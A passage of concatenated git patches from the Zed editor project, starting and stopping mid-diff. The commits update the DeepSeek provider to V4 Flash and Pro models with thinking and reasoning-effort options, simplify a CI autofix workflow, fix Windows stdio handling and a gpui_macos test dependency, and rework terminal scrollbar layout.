V4Flash, + #[serde(rename = "deepseek-v4-pro")] #[default] - Chat, - #[serde(rename = "deepseek-reasoner")] - Reasoner, + V4Pro, #[serde(rename = "custom")] Custom { name: String, @@ -65,29 +65,29 @@ pub enum Model { impl Model { pub fn default_fast() -> Self { - Model::Chat + Model::V4Flash } pub fn from_id(id: &str) -> Result { match id { - "deepseek-chat" => Ok(Self::Chat), - "deepseek-reasoner" => Ok(Self::Reasoner), + "deepseek-v4-flash" => Ok(Self::V4Flash), + "deepseek-v4-pro" => Ok(Self::V4Pro), _ => anyhow::bail!("invalid model id {id}"), } } pub fn id(&self) -> &str { match self 
{ - Self::Chat => "deepseek-chat", - Self::Reasoner => "deepseek-reasoner", + Self::V4Flash => "deepseek-v4-flash", + Self::V4Pro => "deepseek-v4-pro", Self::Custom { name, .. } => name, } } pub fn display_name(&self) -> &str { match self { - Self::Chat => "DeepSeek Chat", - Self::Reasoner => "DeepSeek Reasoner", + Self::V4Flash => "DeepSeek V4 Flash", + Self::V4Pro => "DeepSeek V4 Pro", Self::Custom { name, display_name, .. } => display_name.as_ref().unwrap_or(name).as_str(), @@ -96,16 +96,14 @@ impl Model { pub fn max_token_count(&self) -> u64 { match self { - Self::Chat | Self::Reasoner => 128_000, + Self::V4Flash | Self::V4Pro => 1_000_000, Self::Custom { max_tokens, .. } => *max_tokens, } } pub fn max_output_tokens(&self) -> Option { match self { - // Their API treats this max against the context window, which means we hit the limit a lot - // Using the default value of None in the API instead - Self::Chat | Self::Reasoner => None, + Self::V4Flash | Self::V4Pro => Some(384_000), Self::Custom { max_output_tokens, .. 
} => *max_output_tokens, @@ -123,11 +121,35 @@ pub struct Request { #[serde(default, skip_serializing_if = "Option::is_none")] pub temperature: Option, #[serde(default, skip_serializing_if = "Option::is_none")] + pub thinking: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub reasoning_effort: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] pub response_format: Option, #[serde(default, skip_serializing_if = "Vec::is_empty")] pub tools: Vec, } +#[derive(Debug, Serialize, Deserialize)] +pub struct Thinking { + #[serde(rename = "type")] + pub kind: ThinkingType, +} + +#[derive(Debug, Serialize, Deserialize, Clone, Copy, Eq, PartialEq)] +#[serde(rename_all = "lowercase")] +pub enum ThinkingType { + Enabled, + Disabled, +} + +#[derive(Debug, Serialize, Deserialize, Clone, Copy, Eq, PartialEq)] +#[serde(rename_all = "lowercase")] +pub enum ReasoningEffort { + High, + Max, +} + #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "snake_case")] pub enum ResponseFormat { diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index a08cc25c7b5fb0..9f10da20c124b5 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -1,5 +1,5 @@ use anyhow::{Result, anyhow}; -use collections::{BTreeMap, HashMap}; +use collections::{HashMap, IndexMap}; use credentials_provider::CredentialsProvider; use deepseek::DEEPSEEK_API_URL; @@ -9,10 +9,11 @@ use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, LanguageModelToolChoice, LanguageModelToolResultContent, 
- LanguageModelToolUse, MessageContent, RateLimiter, Role, StopReason, TokenUsage, env_var, + LanguageModelCompletionEvent, LanguageModelEffortLevel, LanguageModelId, LanguageModelName, + LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + LanguageModelProviderState, LanguageModelRequest, LanguageModelToolChoice, + LanguageModelToolResultContent, LanguageModelToolUse, MessageContent, RateLimiter, Role, + StopReason, TokenUsage, env_var, }; pub use settings::DeepseekAvailableModel as AvailableModel; use settings::{Settings, SettingsStore}; @@ -164,10 +165,10 @@ impl LanguageModelProvider for DeepSeekLanguageModelProvider { } fn provided_models(&self, cx: &App) -> Vec> { - let mut models = BTreeMap::default(); + let mut models = IndexMap::default(); - models.insert("deepseek-chat", deepseek::Model::Chat); - models.insert("deepseek-reasoner", deepseek::Model::Reasoner); + models.insert("deepseek-v4-flash", deepseek::Model::V4Flash); + models.insert("deepseek-v4-pro", deepseek::Model::V4Pro); for available_model in &Self::settings(cx).available_models { models.insert( @@ -273,6 +274,32 @@ impl LanguageModel for DeepSeekLanguageModel { true } + fn supports_thinking(&self) -> bool { + matches!( + self.model, + deepseek::Model::V4Flash | deepseek::Model::V4Pro + ) + } + + fn supported_effort_levels(&self) -> Vec { + if !self.supports_thinking() { + return Vec::new(); + } + + vec![ + LanguageModelEffortLevel { + name: "High".into(), + value: "high".into(), + is_default: true, + }, + LanguageModelEffortLevel { + name: "Max".into(), + value: "max".into(), + is_default: false, + }, + ] + } + fn supports_tool_choice(&self, _choice: LanguageModelToolChoice) -> bool { true } @@ -320,7 +347,10 @@ pub fn into_deepseek( model: &deepseek::Model, max_output_tokens: Option, ) -> deepseek::Request { - let is_reasoner = model == &deepseek::Model::Reasoner; + let thinking = deepseek_thinking(model, request.thinking_allowed); + let thinking_enabled = thinking + 
.as_ref() + .is_some_and(|thinking| thinking.kind == deepseek::ThinkingType::Enabled); let mut messages = Vec::new(); let mut current_reasoning: Option = None; @@ -408,11 +438,17 @@ pub fn into_deepseek( messages, stream: true, max_tokens: max_output_tokens, - temperature: if is_reasoner { + temperature: if thinking_enabled { None } else { request.temperature }, + thinking, + reasoning_effort: if thinking_enabled { + into_deepseek_reasoning_effort(request.thinking_effort.as_deref()) + } else { + None + }, response_format: None, tools: request .tools @@ -428,6 +464,32 @@ pub fn into_deepseek( } } +fn deepseek_thinking( + model: &deepseek::Model, + thinking_allowed: bool, +) -> Option { + let kind = match model { + deepseek::Model::V4Flash | deepseek::Model::V4Pro => { + if thinking_allowed { + deepseek::ThinkingType::Enabled + } else { + deepseek::ThinkingType::Disabled + } + } + deepseek::Model::Custom { .. } => return None, + }; + + Some(deepseek::Thinking { kind }) +} + +fn into_deepseek_reasoning_effort(effort: Option<&str>) -> Option { + match effort { + Some("high") => Some(deepseek::ReasoningEffort::High), + Some("max") => Some(deepseek::ReasoningEffort::Max), + _ => None, + } +} + pub struct DeepSeekEventMapper { tool_calls_by_index: HashMap, } diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index f5d6f345968434..fad9ace28aa5da 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -242,7 +242,7 @@ Zed will also use the `DEEPSEEK_API_KEY` environment variable if it's defined. #### Custom Models {#deepseek-custom-models} -The Zed agent comes pre-configured to use the latest version for common models (DeepSeek Chat, DeepSeek Reasoner). +The Zed agent comes pre-configured to use DeepSeek V4 Flash and DeepSeek V4 Pro. 
If you wish to use alternate models or customize the API endpoint, you can do so by adding the following to your Zed settings file ([how to edit](../configuring-zed.md#settings-files)): ```json [settings] @@ -252,15 +252,16 @@ If you wish to use alternate models or customize the API endpoint, you can do so "api_url": "https://api.deepseek.com", "available_models": [ { - "name": "deepseek-chat", - "display_name": "DeepSeek Chat", - "max_tokens": 64000 + "name": "deepseek-v4-flash", + "display_name": "DeepSeek V4 Flash", + "max_tokens": 1000000, + "max_output_tokens": 384000 }, { - "name": "deepseek-reasoner", - "display_name": "DeepSeek Reasoner", - "max_tokens": 64000, - "max_output_tokens": 4096 + "name": "deepseek-v4-pro", + "display_name": "DeepSeek V4 Pro", + "max_tokens": 1000000, + "max_output_tokens": 384000 } ] } From a1438cafe23065a2c4324715019b255293ec14b0 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 27 Apr 2026 16:10:03 +0200 Subject: [PATCH 061/231] ci: Fix autofix workflow (#55004) It also still does too much, but is at least faster while doing so. 
Release Notes: - N/A --- .github/workflows/autofix_pr.yml | 7 +++++-- tooling/xtask/src/tasks/workflows/autofix_pr.rs | 14 +++++--------- 2 files changed, 10 insertions(+), 11 deletions(-) diff --git a/.github/workflows/autofix_pr.yml b/.github/workflows/autofix_pr.yml index 4c0b4ac378c81f..5e4fe70439bc34 100644 --- a/.github/workflows/autofix_pr.yml +++ b/.github/workflows/autofix_pr.yml @@ -16,6 +16,9 @@ on: jobs: run_autofix: runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd @@ -50,13 +53,13 @@ jobs: tool: cargo-machete@0.7.0 - name: autofix_pr::run_autofix::run_cargo_fix if: ${{ inputs.run_clippy }} - run: cargo fix --workspace --release --all-targets --all-features --allow-dirty --allow-staged + run: cargo fix --workspace --allow-dirty --allow-staged - name: autofix_pr::run_autofix::run_cargo_machete_fix if: ${{ inputs.run_clippy }} run: cargo machete --fix - name: autofix_pr::run_autofix::run_clippy_fix if: ${{ inputs.run_clippy }} - run: cargo clippy --workspace --release --all-targets --all-features --fix --allow-dirty --allow-staged + run: cargo clippy --workspace --fix --allow-dirty --allow-staged - name: autofix_pr::run_autofix::run_prettier_fix run: ./script/prettier --write - name: autofix_pr::run_autofix::run_cargo_fmt diff --git a/tooling/xtask/src/tasks/workflows/autofix_pr.rs b/tooling/xtask/src/tasks/workflows/autofix_pr.rs index c2791aba0902fb..cc6563b6cb54f5 100644 --- a/tooling/xtask/src/tasks/workflows/autofix_pr.rs +++ b/tooling/xtask/src/tasks/workflows/autofix_pr.rs @@ -2,7 +2,7 @@ use gh_workflow::*; use crate::tasks::workflows::{ runners, - steps::{self, FluentBuilder, NamedJob, RepositoryTarget, TokenPermissions, named}, + steps::{self, FluentBuilder, NamedJob, RepositoryTarget, TokenPermissions, named, use_clang}, vars::{self, StepOutput, WorkflowInput}, }; @@ -69,9 +69,7 @@ fn run_autofix(pr_number: 
&WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo } fn run_cargo_fix() -> Step { - named::bash( - "cargo fix --workspace --release --all-targets --all-features --allow-dirty --allow-staged", - ) + named::bash("cargo fix --workspace --allow-dirty --allow-staged") } fn run_cargo_machete_fix() -> Step { @@ -79,9 +77,7 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo } fn run_clippy_fix() -> Step { - named::bash( - "cargo clippy --workspace --release --all-targets --all-features --fix --allow-dirty --allow-staged", - ) + named::bash("cargo clippy --workspace --fix --allow-dirty --allow-staged") } fn run_prettier_fix() -> Step { @@ -101,7 +97,7 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo .id("create-patch") } - named::job( + named::job(use_clang( Job::default() .runs_on(runners::LINUX_DEFAULT) .outputs([( @@ -123,7 +119,7 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo .add_step(create_patch()) .add_step(upload_patch_artifact()) .add_step(steps::cleanup_cargo_config(runners::Platform::Linux)), - ) + )) } fn commit_changes(pr_number: &WorkflowInput, autofix_job: &NamedJob) -> NamedJob { From 56c247eae47b605518c1436437e2b21b4cb17203 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jo=C3=A3o=20Soares?= <37777652+Dnreikronos@users.noreply.github.com> Date: Mon, 27 Apr 2026 11:24:17 -0300 Subject: [PATCH 062/231] cli: Null stdio handles when spawning Zed on Windows (#52583) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #51101 Release Notes: - Fixed issue where launching Zed from Git Bash would leave the Ctrl modifier 
stuck in the terminal. ## Demo ### Before: https://github.com/user-attachments/assets/301c73a0-768b-437d-8a88-88d7db320c15 ### After: https://github.com/user-attachments/assets/2ec75f5e-16b9-4551-86d9-d59447712e7a --- crates/cli/src/main.rs | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/crates/cli/src/main.rs b/crates/cli/src/main.rs index 459a8266c7fc24..2b5d10b29b93e8 100644 --- a/crates/cli/src/main.rs +++ b/crates/cli/src/main.rs @@ -1101,7 +1101,7 @@ mod windows { use crate::{Detect, InstalledApp}; use std::io; use std::path::{Path, PathBuf}; - use std::process::ExitStatus; + use std::process::{ExitStatus, Stdio}; fn check_single_instance() -> bool { let mutex = unsafe { @@ -1144,6 +1144,9 @@ mod windows { if let Some(dir) = user_data_dir { cmd.arg("--user-data-dir").arg(dir); } + cmd.stdin(Stdio::null()) + .stdout(Stdio::null()) + .stderr(Stdio::null()); cmd.spawn()?; } else { unsafe { From 7dda2933918d8abc38e7f4e6935fe80c5b705dcf Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Mon, 27 Apr 2026 09:25:22 -0500 Subject: [PATCH 063/231] ep: Improve copy when showing edit predictions is disabled (#54926) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54809 Release Notes: - N/A or Added/Fixed/Improved ... 
--- .../src/edit_prediction_button.rs | 25 +++++++++++-------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/crates/edit_prediction_ui/src/edit_prediction_button.rs b/crates/edit_prediction_ui/src/edit_prediction_button.rs index 4d048c25a53528..f80680d4e59dd0 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_button.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_button.rs @@ -428,6 +428,13 @@ impl Render for EditPredictionButton { None }; + let zed_cloud_needs_sign_in = matches!( + provider, + EditPredictionProvider::Zed | EditPredictionProvider::Experimental(_) + ) && user.is_none(); + let provider_unavailable = + missing_token || mercury_has_error || zed_cloud_needs_sign_in; + let icon_button = IconButton::new("zed-predict-pending-button", ep_icon) .shape(IconButtonShape::Square) .when_some(indicator_color, |this, color| { @@ -435,19 +442,15 @@ impl Render for EditPredictionButton { .indicator_border_color(Some(cx.theme().colors().status_bar_background)) }) .when(!self.popover_menu_handle.is_deployed(), |element| { - let user = user.clone(); - element.tooltip(move |_window, cx| { - let description = if enabled { - if show_editor_predictions { - tooltip_meta - } else if user.is_none() { - "Sign In Or Configure a Provider" - } else { - "Hidden For This File" - } - } else { + let description = if !enabled { "Disabled For This File" + } else if zed_cloud_needs_sign_in { + "Sign In Or Configure a Provider" + } else if provider_unavailable || show_editor_predictions { + tooltip_meta + } else { + "Enable to Use" }; Tooltip::with_meta( From 5e2d7121051682d892cbd93974deeac0a60b1399 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Mon, 27 Apr 2026 17:21:03 -0400 Subject: [PATCH 064/231] gpui_macos: Enable gpui/test-support feature for tests (#54988) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit PR #51415 introduced the `PlatformHeadlessRenderer` trait and `PlatformWindow::render_to_image` 
method in `gpui`, both gated on `#[cfg(any(test, feature = "test-support"))]`, plus corresponding impls in `gpui_macos` (`window.rs` and `metal_renderer.rs`) gated on the same cfg. A dependent crate's `cfg(test)` flag does **not** propagate to its dependencies. So when `cargo test -p gpui_macos` is run in isolation, `gpui_macos`'s own `cfg(test)` is true (its impls get compiled) but `gpui` is just a regular dependency without `test-support` enabled (the trait and method don't exist), and the build fails: ``` error[E0405]: cannot find trait `PlatformHeadlessRenderer` in crate `gpui` error[E0407]: method `render_to_image` is not a member of trait `PlatformWindow` ``` The fix is to enable `gpui/test-support` as a dev-dependency, so the feature is on exactly when `gpui_macos`'s tests are being built. This bug is latent on `main` — workspace-level `cargo test` typically pulls in `gpui/test-support` transitively from other crates, masking it. Running `cargo test -p gpui_macos` alone is what surfaces it. Release Notes: - N/A --- crates/gpui_macos/Cargo.toml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/crates/gpui_macos/Cargo.toml b/crates/gpui_macos/Cargo.toml index 5fae110f93454b..84bde263f252f6 100644 --- a/crates/gpui_macos/Cargo.toml +++ b/crates/gpui_macos/Cargo.toml @@ -61,3 +61,13 @@ uuid.workspace = true [target.'cfg(target_os = "macos")'.build-dependencies] cbindgen = { version = "0.28.0", default-features = false } gpui.workspace = true + +# When this crate is itself being tested (cargo test -p gpui_macos), its own +# cfg(test) flag enables impls of test-only traits like PlatformHeadlessRenderer +# and PlatformWindow::render_to_image. Those traits/methods only exist in gpui +# when gpui's `test-support` feature is on, so we have to turn that feature on +# as a dev-dependency. 
The `cfg(test)` flag of a dependent crate doesn't +# propagate to its dependencies, but dev-dependencies do, so this is the +# correct way to enable the feature exactly when needed. +[target.'cfg(target_os = "macos")'.dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } From 862aab3fee28c5528caa8c9a646533e6cda802c0 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Tue, 28 Apr 2026 00:06:01 +0200 Subject: [PATCH 065/231] terminal_view: Ensure reported size does not change once content becomes scrollable (#46648) This fixes an issue where due to the scrollbar appearing, the reported content size would shift, causing issues in the process. We now actually always reserve space for the scrollbar appropriately as described in https://github.com/zed-industries/zed/pull/33636 initially. Release Notes: - Fixed an issue where the scrollbar could cause a layout shift in the terminal. --------- Co-authored-by: Danilo Leal --- crates/agent_ui/src/threads_archive_view.rs | 4 +- crates/editor/src/element.rs | 2 +- crates/gpui/src/elements/div.rs | 21 +- crates/gpui/src/styled.rs | 9 + crates/picker/src/picker.rs | 3 +- crates/sidebar/src/sidebar.rs | 3 +- crates/terminal_view/src/terminal_view.rs | 5 +- crates/ui/src/components/scrollbar.rs | 427 ++++++++++++-------- 8 files changed, 287 insertions(+), 187 deletions(-) diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index 892c6b0c0e4fb7..8f124d7233b37c 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -1052,9 +1052,7 @@ impl Render for ThreadsArchiveView { .size_full(), ) .custom_scrollbars( - Scrollbars::new(ScrollAxes::Vertical) - .tracked_scroll_handle(&self.list_state) - .width_sm(), + Scrollbars::new(ScrollAxes::Vertical).tracked_scroll_handle(&self.list_state), window, cx, ) diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index d980984c721c86..4b719b1474d38d 100644 
--- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -208,7 +208,7 @@ pub enum SplitSide { } impl EditorElement { - pub(crate) const SCROLLBAR_WIDTH: Pixels = px(15.); + pub(crate) const SCROLLBAR_WIDTH: Pixels = ui::EDITOR_SCROLLBAR_WIDTH; pub fn new(editor: &Entity, style: EditorStyle) -> Self { Self { diff --git a/crates/gpui/src/elements/div.rs b/crates/gpui/src/elements/div.rs index df6403460d92c5..44a1bc4b3826b2 100644 --- a/crates/gpui/src/elements/div.rs +++ b/crates/gpui/src/elements/div.rs @@ -17,12 +17,12 @@ use crate::PinchEvent; use crate::{ - AbsoluteLength, Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent, - DispatchPhase, Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId, - Hitbox, HitboxBehavior, HitboxId, InspectorElementId, IntoElement, IsZero, KeyContext, - KeyDownEvent, KeyUpEvent, KeyboardButton, KeyboardClickEvent, LayoutId, ModifiersChangedEvent, - MouseButton, MouseClickEvent, MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, - Overflow, ParentElement, Pixels, Point, Render, ScrollWheelEvent, SharedString, Size, Style, + Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent, DispatchPhase, + Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId, Hitbox, + HitboxBehavior, HitboxId, InspectorElementId, IntoElement, IsZero, KeyContext, KeyDownEvent, + KeyUpEvent, KeyboardButton, KeyboardClickEvent, LayoutId, ModifiersChangedEvent, MouseButton, + MouseClickEvent, MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, Overflow, + ParentElement, Pixels, Point, Render, ScrollWheelEvent, SharedString, Size, Style, StyleRefinement, Styled, Task, TooltipId, Visibility, Window, WindowControlArea, point, px, size, }; @@ -1200,15 +1200,6 @@ pub trait StatefulInteractiveElement: InteractiveElement { self } - /// Set the space to be reserved for rendering the scrollbar. 
- /// - /// This will only affect the layout of the element when overflow for this element is set to - /// `Overflow::Scroll`. - fn scrollbar_width(mut self, width: impl Into) -> Self { - self.interactivity().base_style.scrollbar_width = Some(width.into()); - self - } - /// Track the scroll state of this element with the given handle. fn track_scroll(mut self, scroll_handle: &ScrollHandle) -> Self { self.interactivity().tracked_scroll_handle = Some(scroll_handle.clone()); diff --git a/crates/gpui/src/styled.rs b/crates/gpui/src/styled.rs index e3c79fdb405d6f..e090ba973fbb32 100644 --- a/crates/gpui/src/styled.rs +++ b/crates/gpui/src/styled.rs @@ -61,6 +61,15 @@ pub trait Styled: Sized { self } + /// Set the space to be reserved for rendering the scrollbar. + /// + /// This will only affect the layout of the element when overflow for this element is set to + /// `Overflow::Scroll`. + fn scrollbar_width(mut self, width: impl Into) -> Self { + self.style().scrollbar_width = Some(width.into()); + self + } + /// Sets the whitespace of the element to `normal`. 
/// [Docs](https://tailwindcss.com/docs/whitespace#normal) fn whitespace_normal(mut self) -> Self { diff --git a/crates/picker/src/picker.rs b/crates/picker/src/picker.rs index cff9da17ac9c33..f2f90db1e637ce 100644 --- a/crates/picker/src/picker.rs +++ b/crates/picker/src/picker.rs @@ -1102,8 +1102,7 @@ impl Render for Picker { .children(self.delegate.render_header(window, cx)) .child(self.render_element_container(cx)) .when(self.show_scrollbar, |this| { - let base_scrollbar_config = - Scrollbars::new(ScrollAxes::Vertical).width_sm(); + let base_scrollbar_config = Scrollbars::new(ScrollAxes::Vertical); this.map(|this| match &self.element_container { ElementContainer::List(state) => this.custom_scrollbars( diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index ebf2518d68d05f..aa07b8c3eef1be 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -5012,8 +5012,7 @@ impl Render for Sidebar { .when_some(sticky_header, |this, header| this.child(header)) .custom_scrollbars( Scrollbars::new(ScrollAxes::Vertical) - .tracked_scroll_handle(&self.list_state) - .width_sm(), + .tracked_scroll_handle(&self.list_state), window, cx, ), diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index aba0040f482ea5..36bac03312356d 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -1279,12 +1279,13 @@ impl Render for TerminalView { self.mode.clone(), )) .when(self.content_mode(window, cx).is_scrollable(), |div| { + let colors = cx.theme().colors(); div.custom_scrollbars( Scrollbars::for_settings::() .show_along(ScrollAxes::Vertical) - .with_track_along( + .with_stable_track_along( ScrollAxes::Vertical, - cx.theme().colors().editor_background, + colors.editor_background, ) .tracked_scroll_handle(&self.scroll_handle), window, diff --git a/crates/ui/src/components/scrollbar.rs b/crates/ui/src/components/scrollbar.rs index 
77ceae9a34684a..3e2c8c8b9acd70 100644 --- a/crates/ui/src/components/scrollbar.rs +++ b/crates/ui/src/components/scrollbar.rs @@ -27,7 +27,9 @@ const SCROLLBAR_HIDE_DELAY_INTERVAL: Duration = Duration::from_secs(1); const SCROLLBAR_HIDE_DURATION: Duration = Duration::from_millis(400); const SCROLLBAR_SHOW_DURATION: Duration = Duration::from_millis(50); +pub const EDITOR_SCROLLBAR_WIDTH: Pixels = ScrollbarStyle::Editor.to_pixels(); const SCROLLBAR_PADDING: Pixels = px(4.); +const BORDER_WIDTH: Pixels = px(1.); pub mod scrollbars { use gpui::{App, Global}; @@ -79,6 +81,7 @@ where { let element_id = config.id.take().unwrap_or_else(|| caller_location.into()); let track_color = config.track_color; + let has_border = config.border; let state = window.use_keyed_state(element_id, cx, |_, cx| { let parent_id = cx.entity_id(); @@ -86,9 +89,9 @@ where }); state.update(cx, |state, cx| { - state - .0 - .update(cx, |state, _cx| state.update_track_color(track_color)) + state.0.update(cx, |state, _cx| { + state.update_colors(track_color, has_border) + }) }); state } @@ -318,6 +321,7 @@ enum ReservedSpace { None, Thumb, Track, + StableTrack, } impl ReservedSpace { @@ -326,24 +330,14 @@ impl ReservedSpace { } fn needs_scroll_track(&self) -> bool { - *self == ReservedSpace::Track + matches!(self, Self::Track | Self::StableTrack) } -} -#[derive(Debug, Default, Clone, Copy)] -enum ScrollbarWidth { - #[default] - Normal, - Small, - XSmall, -} - -impl ScrollbarWidth { - fn to_pixels(&self) -> Pixels { + fn needs_space_reserved(&self, max_offset: Pixels) -> bool { match self { - ScrollbarWidth::Normal => px(8.), - ScrollbarWidth::Small => px(6.), - ScrollbarWidth::XSmall => px(4.), + Self::StableTrack => true, + Self::Track => !max_offset.is_zero(), + _ => false, } } } @@ -354,6 +348,22 @@ enum Handle { Untracked(fn() -> T), } +#[derive(Clone, Copy, Default, PartialEq)] +pub enum ScrollbarStyle { + #[default] + Regular, + Editor, +} + +impl ScrollbarStyle { + pub const fn to_pixels(&self) 
-> Pixels { + match self { + ScrollbarStyle::Regular => px(6.), + ScrollbarStyle::Editor => px(15.), + } + } +} + #[derive(Clone)] pub struct Scrollbars { id: Option, @@ -361,8 +371,9 @@ pub struct Scrollbars { tracked_entity: Option>, scrollable_handle: Handle, visibility: Point, + style: Option, track_color: Option, - scrollbar_width: ScrollbarWidth, + border: bool, } impl Scrollbars { @@ -387,8 +398,9 @@ impl Scrollbars { scrollable_handle: Handle::Untracked(ScrollHandle::new), tracked_entity: None, visibility: show_along.apply_to(Default::default(), ReservedSpace::Thumb), + style: None, track_color: None, - scrollbar_width: ScrollbarWidth::Normal, + border: false, } } } @@ -425,10 +437,11 @@ impl Scrollbars { let Self { id, tracked_entity: tracked_entity_id, - scrollbar_width, visibility, get_visibility, track_color, + border, + style, .. } = self; @@ -437,9 +450,10 @@ impl Scrollbars { id, tracked_entity: tracked_entity_id, visibility, - scrollbar_width, track_color, + border, get_visibility, + style, } } @@ -448,19 +462,21 @@ impl Scrollbars { self } - pub fn with_track_along(mut self, along: ScrollAxes, background_color: Hsla) -> Self { - self.visibility = along.apply_to(self.visibility, ReservedSpace::Track); - self.track_color = Some(background_color); + pub fn style(mut self, style: ScrollbarStyle) -> Self { + self.style = Some(style); self } - pub fn width_sm(mut self) -> Self { - self.scrollbar_width = ScrollbarWidth::Small; + pub fn with_track_along(mut self, along: ScrollAxes, background_color: Hsla) -> Self { + self.visibility = along.apply_to(self.visibility, ReservedSpace::Track); + self.track_color = Some(background_color); self } - pub fn width_xs(mut self) -> Self { - self.scrollbar_width = ScrollbarWidth::XSmall; + pub fn with_stable_track_along(mut self, along: ScrollAxes, background_color: Hsla) -> Self { + self.visibility = along.apply_to(self.visibility, ReservedSpace::StableTrack); + self.track_color = Some(background_color); + self.border 
= true; self } } @@ -469,10 +485,20 @@ impl Scrollbars { enum VisibilityState { Visible, Animating { showing: bool, delta: f32 }, + ThumbHidden, Hidden, Disabled, } +enum AnimationState { + InProgress { + current_delta: f32, + animation_duration: Duration, + showing: bool, + }, + Stale, +} + const DELTA_MAX: f32 = 1.0; impl VisibilityState { @@ -499,7 +525,10 @@ impl VisibilityState { } fn is_visible(&self) -> bool { - matches!(self, Self::Visible | Self::Animating { .. }) + matches!( + self, + Self::Visible | Self::Animating { .. } | Self::ThumbHidden + ) } #[inline] @@ -507,26 +536,29 @@ impl VisibilityState { *self == VisibilityState::Disabled } - fn animation_progress(&self) -> Option<(f32, Duration, bool)> { + fn animation_state(&self) -> Option { match self { - Self::Animating { showing, delta } => Some(( - *delta, - if *showing { + Self::ThumbHidden => Some(AnimationState::Stale), + Self::Animating { showing, delta } => Some(AnimationState::InProgress { + current_delta: *delta, + animation_duration: if *showing { SCROLLBAR_SHOW_DURATION } else { SCROLLBAR_HIDE_DURATION }, - *showing, - )), + showing: *showing, + }), _ => None, } } - fn set_delta(&mut self, new_delta: f32) { + fn set_delta(&mut self, new_delta: f32, keep_track_visible: bool) { match self { - Self::Animating { showing, .. 
} if new_delta >= DELTA_MAX => { + Self::Animating { showing, delta } if new_delta >= DELTA_MAX => { if *showing { *self = Self::Visible; + } else if keep_track_visible { + *self = Self::ThumbHidden; } else { *self = Self::Hidden; } @@ -538,7 +570,7 @@ impl VisibilityState { fn toggle_visible(&self, show_behavior: ShowBehavior) -> Self { match self { - Self::Hidden => { + Self::Hidden | Self::ThumbHidden => { if show_behavior == ShowBehavior::Autohide { Self::for_show() } else { @@ -564,6 +596,12 @@ enum ParentHoverEvent { Outside, } +#[derive(Clone)] +struct TrackColors { + background: Hsla, + has_border: bool, +} + pub fn on_new_scrollbars(cx: &mut App) { cx.observe_new::(|_, window, cx| { if let Some(window) = window { @@ -584,12 +622,12 @@ struct ScrollbarState { notify_id: Option, manually_added: bool, scroll_handle: T, - width: ScrollbarWidth, show_behavior: ShowBehavior, get_visibility: fn(&App) -> ShowScrollbar, visibility: Point, - track_color: Option, + track_color: Option, show_state: VisibilityState, + style: ScrollbarStyle, mouse_in_parent: bool, last_prepaint_state: Option, _auto_hide_task: Option>, @@ -608,11 +646,14 @@ impl ScrollbarState { notify_id: config.tracked_entity.map(|id| id.unwrap_or(parent_id)), manually_added, scroll_handle, - width: config.scrollbar_width, 